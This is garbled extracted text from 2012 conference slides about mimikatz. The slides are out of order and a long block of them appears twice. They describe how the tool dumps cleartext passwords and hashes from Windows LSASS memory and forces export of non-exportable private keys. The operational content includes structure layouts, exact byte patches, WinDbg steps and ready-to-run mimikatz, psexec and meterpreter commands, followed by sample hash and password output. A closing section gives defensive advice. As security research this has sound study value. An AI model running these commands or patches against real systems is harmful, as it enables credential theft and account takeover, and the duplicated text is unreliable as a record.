07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
